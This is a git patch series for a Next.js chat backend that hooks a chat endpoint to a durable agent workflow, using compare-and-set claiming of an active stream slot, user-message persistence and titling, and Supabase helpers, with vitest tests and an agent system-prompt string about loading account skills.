to `next` for + * the given chat. Domain wrapper over the generic `updateChat` helper — + * keeps the CAS-on-active_stream_id concept here (in the chat domain) + * rather than in the Supabase plumbing. + * + * Used by `/api/chat/workflow` to: + * - Claim the slot before `start(workflow)` (`expected: null`, `next: "pending-"`). + * - Promote the placeholder to the real run id after start. + * - Release a stale slot in `reconcileExistingActiveStream`. + * + * @param chatId - Target chat id. + * @param expected - The value `active_stream_id` must currently hold (null to + * require an unset slot). + * @param next - The value to write (null to release the slot). + */ +export async function compareAndSetChatActiveStreamId( + chatId: string, + expected: string | null, + next: string | null, +): Promise { + const result = await updateChat( + { id: chatId, where: { active_stream_id: expected } }, + { active_stream_id: next }, + ); + + if ("error" in result) { + return { ok: false, error: result.error }; + } + + return { ok: true, claimed: result.rowsUpdated > 0 }; +} diff --git a/lib/chat/handleChatWorkflowStream.ts b/lib/chat/handleChatWorkflowStream.ts index 137f699cb..dcaad8585 100644 --- a/lib/chat/handleChatWorkflowStream.ts +++ b/lib/chat/handleChatWorkflowStream.ts @@ -1,31 +1,56 @@ import { NextRequest, NextResponse } from "next/server"; -import { createUIMessageStream, createUIMessageStreamResponse } from "ai"; +import { createUIMessageStreamResponse, type UIMessageChunk } from "ai"; +import { start, getRun } from "workflow/api"; import { validateChatWorkflow } from "@/lib/chat/validateChatWorkflow"; +import { maybeResumeChatStream } from "@/lib/chat/maybeResumeChatStream"; import { selectSessions } from "@/lib/supabase/sessions/selectSessions"; import { selectChats } from "@/lib/supabase/chats/selectChats"; +import { compareAndSetChatActiveStreamId } from "@/lib/chat/compareAndSetChatActiveStreamId"; import { isSandboxActive } from "@/lib/sandbox/isSandboxActive"; +import { buildActiveLifecycleUpdate } from "@/lib/sandbox/buildActiveLifecycleUpdate"; +import { updateSession } from "@/lib/supabase/sessions/updateSession"; +import { persistLatestUserMessage } from "@/lib/chat/persistLatestUserMessage"; import { errorResponse } from "@/lib/networking/errorResponse"; import { getCorsHeaders } from "@/lib/networking/getCorsHeaders"; +import { runAgentWorkflow } from "@/app/lib/workflows/runAgentWorkflow"; import generateUUID from "@/lib/uuid/generateUUID"; +const DEFAULT_MODEL_ID = "anthropic/claude-haiku-4.5"; + /** * Handles POST /api/chat/workflow. * - * Stub implementation: delegates auth + body validation to validateChatWorkflow, - * verifies ownership of the referenced session + chat, confirms the session's - * sandbox is active, then returns a hardcoded UIMessage stream with an - * `x-workflow-run-id` header. The Vercel Workflow that will eventually drive - * the agent loop is wired up in a follow-up PR — this stub exists so clients - * can integrate against the contract documented at - * /api-reference/chat/workflow. + * Wires the chat UI to a durable Vercel Workflow agent loop. Flow: + * + * 1. Validate auth + body (validateChatWorkflow). + * 2. Verify session + chat ownership; ensure the session has an active sandbox. + * 3. If a workflow is already running for this chat, resume / 409 via + * maybeResumeChatStream (extracted for OCP). + * 4. **Claim `chats.active_stream_id` BEFORE starting the workflow** using + * a `pending-` placeholder CAS. Closes the race window where two + * concurrent requests could both call `start()` and bill the model + * before one loses the CAS. + * 5. Refresh the session's lifecycle-activity timestamp + fire-and-forget + * persist the latest user message. + * 6. start(runAgentWorkflow). Replace the placeholder with the real run id + * (we already own the slot, no CAS needed). + * 7. Return the workflow's UIMessage stream with x-workflow-run-id header. + * + * If we lost the placeholder CAS in step 4, the slot is already held by + * another in-flight or pending request → 409 (no workflow was started, so + * nothing to cancel). * - * @param request - The incoming NextRequest - * @returns A streaming Response (200) or a NextResponse error. + * Tools/sandbox passing is intentionally not wired here yet — the follow-up + * PR ports the @open-harness/agent tool surface into api. + * + * @param request - The incoming NextRequest. + * @returns A streaming 200 Response or a NextResponse error. */ export async function handleChatWorkflowStream(request: NextRequest): Promise { const validated = await validateChatWorkflow(request); if (validated instanceof NextResponse) return validated; + // Session + ownership + sandbox active const sessions = await selectSessions({ id: validated.sessionId }); if (sessions === null) return errorResponse("Internal server error", 500); const session = sessions[0]; @@ -33,29 +58,56 @@ export async function handleChatWorkflowStream(request: NextRequest): Promise { - const id = generateUUID(); - writer.write({ type: "text-start", id }); - writer.write({ type: "text-delta", id, delta: "Hello from /api/chat/workflow" }); - writer.write({ type: "text-end", id }); + // We own the slot — safe to start the workflow. + await updateSession(validated.sessionId, buildActiveLifecycleUpdate(session.sandbox_state)); + void persistLatestUserMessage(validated.chatId, validated.messages as never); + + const modelId = chat.model_id ?? DEFAULT_MODEL_ID; + const run = await start(runAgentWorkflow, [ + { + messages: validated.messages, + chatId: validated.chatId, + sessionId: validated.sessionId, + modelId, }, - }); + ]); + + // Promote placeholder → real run id via CAS. If something asynchronously + // stole the slot (or the DB went down) we cancel the workflow we just + // started since another stream now owns the client. + const promoted = await compareAndSetChatActiveStreamId(validated.chatId, placeholder, run.runId); + if (!promoted.ok || !promoted.claimed) { + try { + await getRun(run.runId).cancel(); + } catch (error) { + console.error("[handleChatWorkflowStream] cancel after slot-loss failed:", error); + } + return errorResponse("Another workflow is already running for this chat", 409); + } return createUIMessageStreamResponse({ - stream, - headers: { - ...getCorsHeaders(), - "x-workflow-run-id": runId, - }, + stream: run.getReadable(), + headers: { ...getCorsHeaders(), "x-workflow-run-id": run.runId }, }); } diff --git a/lib/chat/maybeResumeChatStream.ts b/lib/chat/maybeResumeChatStream.ts new file mode 100644 index 000000000..209113fbf --- /dev/null +++ b/lib/chat/maybeResumeChatStream.ts @@ -0,0 +1,40 @@ +import { createUIMessageStreamResponse, type UIMessageChunk } from "ai"; +import { reconcileExistingActiveStream } from "@/lib/chat/reconcileExistingActiveStream"; +import { errorResponse } from "@/lib/networking/errorResponse"; +import { getCorsHeaders } from "@/lib/networking/getCorsHeaders"; + +/** + * Encapsulates the "is there already a workflow for this chat?" branch of + * the POST /api/chat/workflow handler. + * + * - If `activeStreamId` is unset → returns `null`; handler proceeds with + * a fresh workflow. + * - If a workflow is alive → returns a streaming `Response` that pipes + * the existing run's readable back to the client. + * - If the slot is held by a dead/transient/raced run → returns a 409 + * `Response`. + * + * Extracted from the handler so the orchestration stays small and the + * resume-vs-conflict logic can grow independently. + */ +export async function maybeResumeChatStream( + chatId: string, + activeStreamId: string | null, +): Promise { + if (!activeStreamId) return null; + + const reconciled = await reconcileExistingActiveStream(chatId, activeStreamId); + + if (reconciled.action === "resume") { + return createUIMessageStreamResponse({ + stream: reconciled.stream as ReadableStream, + headers: { ...getCorsHeaders(), "x-workflow-run-id": reconciled.runId }, + }); + } + + if (reconciled.action === "conflict") { + return errorResponse("Another workflow is already running for this chat", 409); + } + + return null; // action: "ready" — caller starts a new workflow. +} diff --git a/lib/chat/persistLatestUserMessage.ts b/lib/chat/persistLatestUserMessage.ts new file mode 100644 index 000000000..73c06f5ef --- /dev/null +++ b/lib/chat/persistLatestUserMessage.ts @@ -0,0 +1,84 @@ +import { upsertChatMessage } from "@/lib/supabase/chat_messages/upsertChatMessage"; +import { selectChatMessages } from "@/lib/supabase/chat_messages/selectChatMessages"; +import { updateChat } from "@/lib/supabase/chats/updateChat"; + +type TextPart = { type: "text"; text: string }; +type UserMessage = { id: string; role: string; parts: Array }; + +const TITLE_MAX_LENGTH = 80; +const TRUNCATION_SUFFIX = "…"; +const TITLE_BODY_BUDGET = TITLE_MAX_LENGTH - TRUNCATION_SUFFIX.length; + +/** + * Fire-and-forget persistence of the latest user message in a chat-workflow + * request. Called before `start(runAgentWorkflow, ...)` so that: + * + * - A page refresh during workflow queue time still shows the user message. + * - The chat's `updated_at` reflects activity even if the workflow hasn't + * produced its first chunk yet. + * - The chat title is set from the first user message (capped at 80 chars + * including the truncation suffix, addressing the prior off-by-3 bug). + * + * Title-eligibility uses "earliest message in the chat", not "only message", + * so a fast-following second message can't race past the title-set. + * + * All failures are caught and logged — this MUST NOT block the request path. + * + * @param chatId - The target chat. + * @param messages - The full message list from the request body. + */ +export async function persistLatestUserMessage( + chatId: string, + messages: UserMessage[], +): Promise { + try { + const latest = messages[messages.length - 1]; + if (!latest || latest.role !== "user") return; + + const inserted = await upsertChatMessage({ + id: latest.id, + chat_id: chatId, + role: "user", + parts: latest as never, + }); + + // Bail on DB errors (already logged). Don't touch the chat or set a title + // since we can't confirm the message landed. + if (!inserted.ok) return; + + // If it was a duplicate, the original insert already drove side effects. + if (inserted.isDuplicate || inserted.row === null) return; + + await updateChat({ id: chatId }, { updated_at: new Date().toISOString() }); + + // Title-set is gated on "is this row still the earliest message in the chat?" + // — a fast follow-up message that landed before this query wouldn't shift + // the earliest row's id, so we'd still title from this message correctly, + // and racing in the opposite direction (this message landed second) gives + // us a different id at position 0 and we correctly skip. + const earliest = await selectChatMessages({ + chatId, + orderBy: { createdAt: "asc" }, + limit: 1, + }); + + // DB-error or no rows — bail without titling. + if (!earliest || earliest.length === 0) return; + if (earliest[0]?.id !== inserted.row.id) return; + + const text = latest.parts + .filter((part): part is TextPart => part.type === "text") + .map(part => part.text) + .join(" ") + .trim(); + if (text.length === 0) return; + + const title = + text.length > TITLE_MAX_LENGTH + ? `${text.slice(0, TITLE_BODY_BUDGET)}${TRUNCATION_SUFFIX}` + : text; + await updateChat({ id: chatId }, { title }); + } catch (error) { + console.error("[persistLatestUserMessage] error:", error); + } +} diff --git a/lib/chat/reconcileExistingActiveStream.ts b/lib/chat/reconcileExistingActiveStream.ts new file mode 100644 index 000000000..4ab004493 --- /dev/null +++ b/lib/chat/reconcileExistingActiveStream.ts @@ -0,0 +1,56 @@ +import { getRun } from "workflow/api"; +import { compareAndSetChatActiveStreamId } from "@/lib/chat/compareAndSetChatActiveStreamId"; + +export type ReconcileResult = + | { action: "resume"; runId: string; stream: ReadableStream } + | { action: "ready" } + | { action: "conflict" }; + +const RUNNING_STATUSES = new Set(["running", "pending"]); + +/** + * Resolves what to do when `chats.active_stream_id` is already set at the + * start of a new chat-workflow request. + * + * - If the referenced workflow run is alive (`running` | `pending`) → + * `action: "resume"` with the existing readable. Caller pipes it back to + * the client. + * - If the run is terminally done AND we win the CAS to clear the stale id + * → `action: "ready"`. Caller starts a fresh workflow. + * - **Anything else** (workflow API throws, CAS-clear loses the race, CAS + * reports a DB error) → `action: "conflict"`. Surfaces as 409 upstream. + * + * Safer-than-open-agents error semantics: a transient `workflow/api` failure + * does NOT clear the stale stream id (which previously created a window for + * duplicate runs). When we can't confidently say "this stream is dead", we + * refuse to start a new one. Eventually the real run completes, a subsequent + * request observes that, clears the slot, and unblocks. + */ +export async function reconcileExistingActiveStream( + chatId: string, + activeStreamId: string, +): Promise { + // Probe the workflow status. Any thrown error here is treated as transient — + // we keep the slot held rather than risk starting a duplicate run. + let status: string; + try { + const existingRun = getRun(activeStreamId); + status = await existingRun.status; + if (RUNNING_STATUSES.has(status)) { + return { action: "resume", runId: activeStreamId, stream: existingRun.getReadable() }; + } + } catch (error) { + console.error("[reconcileExistingActiveStream] getRun failed; treating as conflict:", error); + return { action: "conflict" }; + } + + // Run is terminally done. Attempt to clear the stale id via CAS. If we + // win → ready. Anything else (race lost OR DB error) → conflict, so we + // never accidentally start a duplicate workflow on the back of a failed + // read. + const cleared = await compareAndSetChatActiveStreamId(chatId, activeStreamId, null); + if (cleared.ok && cleared.claimed) { + return { action: "ready" }; + } + return { action: "conflict" }; +} diff --git a/lib/chat/recoupApiSkillPrompt.ts b/lib/chat/recoupApiSkillPrompt.ts new file mode 100644 index 000000000..93f4d2e39 --- /dev/null +++ b/lib/chat/recoupApiSkillPrompt.ts @@ -0,0 +1,11 @@ +/** + * Always-on nudge appended to the agent's system instructions. Points + * at the `recoup-api` and `artist-workspace` skills so prompts about + * anything owned by the user's Recoup account reliably load the right + * playbook — either the filesystem (for sandbox inventory and create- + * artist scaffolding) or the API (for live data) — instead of the + * agent guessing endpoint paths or interpreting overloaded nouns like + * "tasks" as generic repo TODOs. + */ +export const recoupApiSkillPrompt = + 'If you\'re asked about anything belonging to their Recoup account — artists, socials, orgs, research, tasks, chats, pulses, notifications, subscriptions, or any other resource visible at recoup-api.vercel.app / developers.recoupable.com — pick the right skill first instead of guessing. For inventory questions about this sandbox ("what artists / orgs do I have", "list my artists", "what\'s in here") load `artist-workspace` — the `artists/{artist-slug}/RECOUP.md` tree is authoritative for this sandbox (the sandbox is already org-scoped — its repo IS the org — so artists live at the top level, not under an `orgs/` directory) and the API is not. For create-artist intents ("create artist", "onboard X", "add an artist", "set up a new artist") also load `artist-workspace` first — it scaffolds the artist\'s `RECOUP.md` as a checklist file you tick off step-by-step, which is what keeps the 8-step chain from dropping steps when run from a sandbox; the curl-by-curl reference for each step lives via `recoup-api` (developers.recoupable.com/workflows/create-artist), but the checklist file is the source of truth for what\'s done. For live data (socials, posts, metrics, research, tasks, notifications) or anything not in the tree, load `recoup-api` — and when `RECOUP_ORG_ID` is set in the env, scope list endpoints to that org (`/api/organizations/$RECOUP_ORG_ID/...`, `--org $RECOUP_ORG_ID` on the CLI) so you get results for the sandbox\'s org, not every org the user belongs to. Treat ambiguous account-data questions as Recoup questions by default, not repo-level TODOs.'; diff --git a/lib/recoupable/__tests__/extractOrgId.test.ts b/lib/recoupable/__tests__/extractOrgId.test.ts new file mode 100644 index 000000000..c38232c4c --- /dev/null +++ b/lib/recoupable/__tests__/extractOrgId.test.ts @@ -0,0 +1,57 @@ +import { describe, it, expect } from "vitest"; +import { extractOrgId } from "@/lib/recoupable/extractOrgId"; + +describe("extractOrgId", () => { + it("extracts the UUID tail from a full clone URL", () => { + expect( + extractOrgId( + "https://github.com/recoupable/org-rostrum-pacific-cebcc866-34c3-451c-8cd7-f63309acff0a", + ), + ).toBe("cebcc866-34c3-451c-8cd7-f63309acff0a"); + }); + + it("strips a .git suffix before extracting", () => { + expect( + extractOrgId( + "https://github.com/recoupable/org-myco-wtf-80263819-9dfd-4bbf-9371-60a6185122d6.git", + ), + ).toBe("80263819-9dfd-4bbf-9371-60a6185122d6"); + }); + + it("tolerates a trailing slash on the URL", () => { + expect( + extractOrgId( + "https://github.com/recoupable/org-myco-wtf-80263819-9dfd-4bbf-9371-60a6185122d6/", + ), + ).toBe("80263819-9dfd-4bbf-9371-60a6185122d6"); + }); + + it("accepts an already-extracted repo name", () => { + expect(extractOrgId("org-rostrum-pacific-cebcc866-34c3-451c-8cd7-f63309acff0a")).toBe( + "cebcc866-34c3-451c-8cd7-f63309acff0a", + ); + }); + + it("lowercases an uppercase UUID", () => { + expect(extractOrgId("org-myco-wtf-80263819-9DFD-4BBF-9371-60A6185122D6")).toBe( + "80263819-9dfd-4bbf-9371-60a6185122d6", + ); + }); + + it("returns null for non-Recoupable clone URLs", () => { + expect( + extractOrgId( + "https://github.com/someone-else/org-myco-wtf-80263819-9dfd-4bbf-9371-60a6185122d6", + ), + ).toBeNull(); + }); + + it("returns null when the repo name has no UUID tail", () => { + expect(extractOrgId("org-rostrum-pacific")).toBeNull(); + }); + + it("returns null for malformed strings", () => { + expect(extractOrgId("")).toBeNull(); + expect(extractOrgId("not-a-url-or-repo")).toBeNull(); + }); +}); diff --git a/lib/recoupable/extractOrgId.ts b/lib/recoupable/extractOrgId.ts new file mode 100644 index 000000000..ac30985c5 --- /dev/null +++ b/lib/recoupable/extractOrgId.ts @@ -0,0 +1,31 @@ +import { extractOrgRepoName } from "@/lib/recoupable/extractOrgRepoName"; + +const UUID_TAIL_PATTERN = /-([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})$/i; + +/** + * Extracts the organization UUID from a Recoupable org clone URL or + * repo name. Recoupable orgs follow the convention `org--` + * in their GitHub repo names, so the UUID is always the trailing 36 chars. + * + * Used by the chat workflow handler to derive `recoupOrgId` from the + * session's clone URL — the `recoup-api` skill scopes calls to this org + * so sandbox agents see results for the sandbox's org rather than every + * org the user belongs to. + * + * @param cloneUrlOrRepoName - Either the full clone URL + * (`https://github.com/recoupable/org-foo-`) or the already-extracted + * repo name (`org-foo-`). + * @returns The lowercased UUID, or `null` for anything that doesn't match. + */ +export function extractOrgId(cloneUrlOrRepoName: string): string | null { + const repoName = cloneUrlOrRepoName.startsWith("http") + ? extractOrgRepoName(cloneUrlOrRepoName) + : cloneUrlOrRepoName; + + if (!repoName) { + return null; + } + + const match = repoName.match(UUID_TAIL_PATTERN); + return match?.[1]?.toLowerCase() ?? null; +} diff --git a/lib/supabase/chat_messages/__tests__/selectChatMessages.test.ts b/lib/supabase/chat_messages/__tests__/selectChatMessages.test.ts new file mode 100644 index 000000000..c973f24df --- /dev/null +++ b/lib/supabase/chat_messages/__tests__/selectChatMessages.test.ts @@ -0,0 +1,58 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { selectChatMessages } from "@/lib/supabase/chat_messages/selectChatMessages"; + +const selectChain = vi.fn(); +const eqChain = vi.fn(); +const orderChain = vi.fn(); +const limitChain = vi.fn(); + +vi.mock("@/lib/supabase/serverClient", () => ({ + default: { + from: vi.fn(() => ({ select: selectChain })), + }, +})); + +beforeEach(() => { + vi.clearAllMocks(); + // Allow any number of chained .eq() / .order() / .limit() calls — they all + // return the same fluent builder. + const builder = { eq: eqChain, order: orderChain, limit: limitChain }; + selectChain.mockReturnValue(builder); + eqChain.mockReturnValue(builder); + orderChain.mockReturnValue(builder); + limitChain.mockReturnValue(builder); +}); + +describe("selectChatMessages", () => { + it("returns rows on success", async () => { + limitChain.mockResolvedValue({ data: [{ id: "m-1" }], error: null }); + const result = await selectChatMessages({ + chatId: "c-1", + orderBy: { createdAt: "asc" }, + limit: 1, + }); + expect(result).toEqual([{ id: "m-1" }]); + expect(eqChain).toHaveBeenCalledWith("chat_id", "c-1"); + expect(orderChain).toHaveBeenCalledWith("created_at", { ascending: true }); + expect(limitChain).toHaveBeenCalledWith(1); + }); + + it("returns null on Supabase error (so callers can distinguish from empty)", async () => { + // With no filters, the terminal call is on selectChain itself + selectChain.mockResolvedValue({ data: null, error: { message: "down" } }); + const result = await selectChatMessages({}); + expect(result).toBeNull(); + }); + + it("returns [] on no match", async () => { + limitChain.mockResolvedValue({ data: [], error: null }); + const result = await selectChatMessages({ chatId: "c-1", limit: 1 }); + expect(result).toEqual([]); + }); + + it("applies desc ordering when requested", async () => { + limitChain.mockResolvedValue({ data: [], error: null }); + await selectChatMessages({ chatId: "c-1", orderBy: { createdAt: "desc" }, limit: 1 }); + expect(orderChain).toHaveBeenCalledWith("created_at", { ascending: false }); + }); +}); diff --git a/lib/supabase/chat_messages/__tests__/upsertChatMessage.test.ts b/lib/supabase/chat_messages/__tests__/upsertChatMessage.test.ts new file mode 100644 index 000000000..0ea559058 --- /dev/null +++ b/lib/supabase/chat_messages/__tests__/upsertChatMessage.test.ts @@ -0,0 +1,46 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { upsertChatMessage } from "@/lib/supabase/chat_messages/upsertChatMessage"; + +const upsertChain = vi.fn(); +const selectChain = vi.fn(); +const maybeSingleChain = vi.fn(); + +vi.mock("@/lib/supabase/serverClient", () => ({ + default: { + from: vi.fn(() => ({ upsert: upsertChain })), + }, +})); + +beforeEach(() => { + vi.clearAllMocks(); + upsertChain.mockReturnValue({ select: selectChain }); + selectChain.mockReturnValue({ maybeSingle: maybeSingleChain }); +}); + +const data = { + id: "msg-1", + chat_id: "chat-1", + role: "user" as const, + parts: [{ type: "text", text: "hi" }], +}; + +describe("upsertChatMessage", () => { + it("returns ok:true with the row and isDuplicate:false on new insert", async () => { + maybeSingleChain.mockResolvedValue({ data, error: null }); + const result = await upsertChatMessage(data); + expect(result).toEqual({ ok: true, row: data, isDuplicate: false }); + expect(upsertChain).toHaveBeenCalledWith(data, { onConflict: "id", ignoreDuplicates: true }); + }); + + it("returns ok:true with isDuplicate:true when the id already existed", async () => { + maybeSingleChain.mockResolvedValue({ data: null, error: null }); + const result = await upsertChatMessage(data); + expect(result).toEqual({ ok: true, row: null, isDuplicate: true }); + }); + + it("returns ok:false with error on Supabase failure (distinct from duplicate)", async () => { + maybeSingleChain.mockResolvedValue({ data: null, error: { message: "down" } }); + const result = await upsertChatMessage(data); + expect(result).toEqual({ ok: false, error: "down" }); + }); +}); diff --git a/lib/supabase/chat_messages/selectChatMessages.ts b/lib/supabase/chat_messages/selectChatMessages.ts new file mode 100644 index 000000000..ff2ceae24 --- /dev/null +++ b/lib/supabase/chat_messages/selectChatMessages.ts @@ -0,0 +1,40 @@ +import supabase from "@/lib/supabase/serverClient"; +import type { Tables } from "@/types/database.types"; + +export type SelectChatMessagesFilter = { + id?: string; + chatId?: string; + /** Order by `created_at` direction. Defaults to ascending (oldest first). */ + orderBy?: { createdAt: "asc" | "desc" }; + /** Maximum rows to return. Omit for no limit. */ + limit?: number; +}; + +/** + * Generic `chat_messages` reader mirroring the `selectChats` / `selectSessions` + * pattern. Returns rows on success, `[]` on no match, or `null` on Supabase + * error so callers can distinguish "nothing here" from "DB unreachable". + * + * Domain-specific questions ("is this the first message in the chat?") live + * in wrapper helpers under `lib/chat/` — keep this file focused on the + * read primitive. + */ +export async function selectChatMessages( + filter: SelectChatMessagesFilter = {}, +): Promise[] | null> { + let query = supabase.from("chat_messages").select("*"); + if (filter.id) query = query.eq("id", filter.id); + if (filter.chatId) query = query.eq("chat_id", filter.chatId); + if (filter.orderBy) { + query = query.order("created_at", { ascending: filter.orderBy.createdAt === "asc" }); + query = query.order("id", { ascending: true }); + } + if (filter.limit !== undefined) query = query.limit(filter.limit); + + const { data, error } = await query; + if (error) { + console.error("[selectChatMessages] error:", error); + return null; + } + return data ?? []; +} diff --git a/lib/supabase/chat_messages/upsertChatMessage.ts b/lib/supabase/chat_messages/upsertChatMessage.ts new file mode 100644 index 000000000..d98b9b343 --- /dev/null +++ b/lib/supabase/chat_messages/upsertChatMessage.ts @@ -0,0 +1,37 @@ +import supabase from "@/lib/supabase/serverClient"; +import type { Tables, TablesInsert } from "@/types/database.types"; + +/** + * Discriminated result so callers can distinguish: + * - `{ ok: true, row, isDuplicate }` — known outcome; row is null when the + * existing `id` conflict was silently ignored. + * - `{ ok: false, error }` — Supabase failure. Visible to logs so transient + * DB problems aren't masked as duplicates. + */ +export type UpsertChatMessageResult = + | { ok: true; row: Tables<"chat_messages"> | null; isDuplicate: boolean } + | { ok: false; error: string }; + +/** + * Insert-or-skip a single chat message row. Wraps Supabase upsert with + * `ignoreDuplicates: true` on the `id` primary key, but returns a + * discriminated result so callers can tell "duplicate skipped" apart from + * "DB error" — the previous helper returned `null` for both, which made + * callers silently swallow operational failures. + */ +export async function upsertChatMessage( + data: TablesInsert<"chat_messages">, +): Promise { + const { data: row, error } = await supabase + .from("chat_messages") + .upsert(data, { onConflict: "id", ignoreDuplicates: true }) + .select() + .maybeSingle(); + + if (error) { + console.error("[upsertChatMessage] error:", error); + return { ok: false, error: error.message }; + } + + return { ok: true, row, isDuplicate: row === null }; +} diff --git a/lib/supabase/chats/__tests__/updateChat.test.ts b/lib/supabase/chats/__tests__/updateChat.test.ts new file mode 100644 index 000000000..a0edc247b --- /dev/null +++ b/lib/supabase/chats/__tests__/updateChat.test.ts @@ -0,0 +1,110 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { updateChat } from "@/lib/supabase/chats/updateChat"; + +const updateChain = vi.fn(); +const eqChain = vi.fn(); +const matchChain = vi.fn(); +const isChain = vi.fn(); +const selectChain = vi.fn(); + +vi.mock("@/lib/supabase/serverClient", () => ({ + default: { + from: vi.fn(() => ({ update: updateChain })), + }, +})); + +beforeEach(() => { + vi.clearAllMocks(); + // Fluent builder mock — every method returns the same builder so we can + // chain .eq / .match / .is / .select in any order without per-step setup. + const builder = { eq: eqChain, match: matchChain, is: isChain, select: selectChain }; + updateChain.mockReturnValue(builder); + eqChain.mockReturnValue(builder); + matchChain.mockReturnValue(builder); + isChain.mockReturnValue(builder); +}); + +describe("updateChat", () => { + describe("plain update (no where predicate)", () => { + it("returns ok:true with rowsUpdated and the row on success", async () => { + const row = { id: "chat-1", title: "renamed" }; + selectChain.mockResolvedValue({ data: [row], error: null }); + const result = await updateChat({ id: "chat-1" }, { title: "renamed" }); + expect(result.ok).toBe(true); + if (!result.ok) return; + expect(result.rowsUpdated).toBe(1); + expect(result.row).toEqual(row); + expect(updateChain).toHaveBeenCalledWith({ title: "renamed" }); + expect(eqChain).toHaveBeenCalledWith("id", "chat-1"); + // With no where filter, match is called with an empty object. + expect(matchChain).toHaveBeenCalledWith({}); + }); + + it("returns ok:false with error on Supabase failure", async () => { + selectChain.mockResolvedValue({ data: null, error: { message: "down" } }); + const result = await updateChat({ id: "chat-x" }, { title: "x" }); + expect(result.ok).toBe(false); + if (result.ok) return; + expect(result.error).toBe("down"); + }); + }); + + describe("generic where predicate", () => { + it("emits `is null` for null values (e.g. CAS expecting unset)", async () => { + selectChain.mockResolvedValue({ data: [{ id: "c-1" }], error: null }); + await updateChat( + { id: "c-1", where: { active_stream_id: null } }, + { active_stream_id: "wrun_x" }, + ); + expect(isChain).toHaveBeenCalledWith("active_stream_id", null); + // No non-null fields → match called with empty {} + expect(matchChain).toHaveBeenCalledWith({}); + }); + + it("emits `match()` for non-null values (e.g. CAS expecting a specific run id)", async () => { + selectChain.mockResolvedValue({ data: [{ id: "c-1" }], error: null }); + await updateChat( + { id: "c-1", where: { active_stream_id: "wrun_old" } }, + { active_stream_id: "wrun_new" }, + ); + expect(matchChain).toHaveBeenCalledWith({ active_stream_id: "wrun_old" }); + // No null fields → is() not called + expect(isChain).not.toHaveBeenCalled(); + }); + + it("AND-s nullable + equality where columns together", async () => { + selectChain.mockResolvedValue({ data: [{ id: "c-1" }], error: null }); + await updateChat( + { id: "c-1", where: { active_stream_id: null, model_id: "anthropic/claude-haiku-4.5" } }, + { title: "x" }, + ); + expect(isChain).toHaveBeenCalledWith("active_stream_id", null); + expect(matchChain).toHaveBeenCalledWith({ model_id: "anthropic/claude-haiku-4.5" }); + }); + + it("returns ok:true rowsUpdated:0 when the predicate matches no row (race lost)", async () => { + selectChain.mockResolvedValue({ data: [], error: null }); + const result = await updateChat( + { id: "c-1", where: { active_stream_id: null } }, + { active_stream_id: "wrun_x" }, + ); + expect(result).toEqual(expect.objectContaining({ ok: true, rowsUpdated: 0 })); + }); + + it("differentiates 'race lost' (ok:true,rows:0) from 'DB error' (ok:false)", async () => { + selectChain.mockResolvedValueOnce({ data: [], error: null }); + const raceLost = await updateChat( + { id: "c-1", where: { active_stream_id: null } }, + { active_stream_id: "wrun_x" }, + ); + expect(raceLost).toEqual(expect.objectContaining({ ok: true, rowsUpdated: 0 })); + + selectChain.mockResolvedValueOnce({ data: null, error: { message: "down" } }); + const dbError = await updateChat( + { id: "c-1", where: { active_stream_id: null } }, + { active_stream_id: "wrun_x" }, + ); + expect(dbError).toEqual(expect.objectContaining({ ok: false, error: "down" })); + }); + }); +}); diff --git a/lib/supabase/chats/updateChat.ts b/lib/supabase/chats/updateChat.ts new file mode 100644 index 000000000..63cd2064b --- /dev/null +++ b/lib/supabase/chats/updateChat.ts @@ -0,0 +1,86 @@ +import supabase from "@/lib/supabase/serverClient"; +import type { Tables, TablesUpdate } from "@/types/database.types"; + +/** + * Subset of `chats` columns that callers are permitted to mutate via this + * helper. Explicitly excludes structural fields (`id`, `session_id`, + * `created_at`) so generic updates cannot bypass chat invariants. + */ +export type ChatMutableFields = Pick< + TablesUpdate<"chats">, + "title" | "model_id" | "updated_at" | "active_stream_id" | "last_assistant_message_at" +>; + +/** + * Filter accepted by {@link updateChat}. Always matches by `id`. Optional + * `where` adds AND-ed predicates per column — generic across columns so + * domain-specific concerns (e.g. CAS on `active_stream_id`) stay in their + * own wrapper helpers rather than baking into the Supabase plumbing. + * + * Each `where` entry maps to `column = value` (or `column IS NULL` when + * `value === null`). + */ +export type UpdateChatFilter = { + id: string; + where?: Partial>; +}; + +/** + * Discriminated result so callers can distinguish: + * - `{ ok: true, rowsUpdated: 1 }` — updated as intended. + * - `{ ok: true, rowsUpdated: 0 }` — the predicate matched zero rows (a CAS + * race lost, or `id` not found). + * - `{ ok: false, error }` — Supabase / network failure. + */ +export type UpdateChatResult = + | { ok: true; rowsUpdated: number; row: Tables<"chats"> | null } + | { ok: false; error: string }; + +/** + * Updates a `chats` row by id, optionally constrained by a generic `where` + * predicate. Returns a discriminated result so callers can tell + * "predicate didn't match" (a race lost) from "Supabase failure" (operational + * issue) — the previous behavior of returning `false` for both was a CAS bug. + */ +export async function updateChat( + filter: UpdateChatFilter, + updates: ChatMutableFields, +): Promise { + // Split the optional `where` map into nullable vs equality predicates so we + // can apply each as a single chained call (`.match()` for equalities, + // `.is(col, null)` per nullable). Iterating with `let query = ...` and + // reassigning in a for-loop confuses Supabase's deeply generic builder + // types ("type instantiation is excessively deep") in the Next.js build. + const entries = Object.entries(filter.where ?? {}); + const equalityMatches: Record = {}; + const nullColumns: string[] = []; + for (const [column, value] of entries) { + if (value === null) { + nullColumns.push(column); + } else { + equalityMatches[column] = value; + } + } + + const baseQuery = supabase + .from("chats") + .update(updates) + .eq("id", filter.id) + .match(equalityMatches); + const finalQuery = nullColumns.reduce( + (q, column) => q.is(column, null) as typeof baseQuery, + baseQuery, + ); + + const { data, error } = await finalQuery.select(); + if (error) { + console.error("[updateChat] error:", error); + return { ok: false, error: error.message }; + } + + return { + ok: true, + rowsUpdated: data?.length ?? 0, + row: data?.[0] ?? null, + }; +} From dcddcbffabe284f8c9b577ecefc7961174e16a49 Mon Sep 17 00:00:00 2001 From: "sweetman.eth" Date: Thu, 21 May 2026 13:12:07 -0500 Subject: [PATCH 3/3] feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4, slim) (#583) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim) Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it through the workflow via streamText's 